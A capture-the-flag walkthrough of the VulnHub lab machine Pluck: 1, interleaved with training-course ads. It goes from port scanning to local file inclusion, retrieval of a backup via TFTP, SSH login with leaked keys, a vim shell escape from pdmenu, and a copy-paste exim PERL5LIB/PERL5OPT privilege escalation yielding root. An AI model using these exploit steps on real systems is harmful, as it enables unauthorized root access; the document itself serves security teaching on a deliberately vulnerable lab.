Pluck: 1 CTF Walkthrough

Pluck: 1 is a vulnerable machine created by Ryan Oberto. It surfaced on VulnHub on 11^th March 2017. It can be downloaded from https://www.vulnhub.com/entry/pluck-1,178/

The file can be used with VMWare as well as VirtualBox. The machine is Linux based.

Learn ICS/SCADA Security Fundamentals

Build your SCADA security skills with six hands-on courses covering access controls, common cyber threats, process control networks and more.

Start Learning

The objective is to read the flag present in the machine with root privileges.

Downloaded and fired up, it presents with a login screen with shows the target IP:

Since we have our target IP, let's scan and see what we can find:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:

• Port 22 - Used for SSH
• Port 80 - Used to serve a web application
• Port 3306 - Running MySQL

Seeing that port 80 is open, my first instinct was to check what's the server running:

Looking at the URL formed, it made me try to look for LFI (Local File Inclusion), and it worked:

http://172.16.92.142/index.php?page=about.php

Looking at the output, it talks about a user called backup-user whose job is to take periodic backups and store them. Let's see what it shows us:

To get the backup.tar file, I used to connect with TFTP (Trivial File Transfer Protocol) and downloaded the backup.tar file:

$ tftp

tftp> connect 172.16.92.142

tftp> get backup.tar

tftp> quit

On extracting the contents of backup.tar, we see there are two folders:

• Home
• Var

$ tar -xvf backup.tar

On further examination, we see that the user Paul, has a few keys up his sleeves:

Let's try to use them and see if any of them works. After trying a few, id_key4 showed the following:

$ ssh -I id_key4 paul@172.16.92.142

Here, we are presented with pdmenu. To get to a shell, go on to Edit file and enter any file name. You will be presented with vim, and to exit to a shell, simply write:

:set shell =/bin/bash

and then type :shell to exit to a shell

Checking about the user and the system, we find:

Now to read the flag, we need to get root privilege. After doing some research, I found the following exploit (https://www.exploit-db.com/exploits/39535/). Simply copying and pasting the following, gave us root:

cat > /tmp/root.pm << EOF

package root;

use strict;

use warnings;

system("/bin/sh");

EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

and voila, we have the flag:

Learn Vulnerability Assessments

Seven courses build the skills needed to perform a custom vulnerability assessment for any computer system, application or network.

Start Learning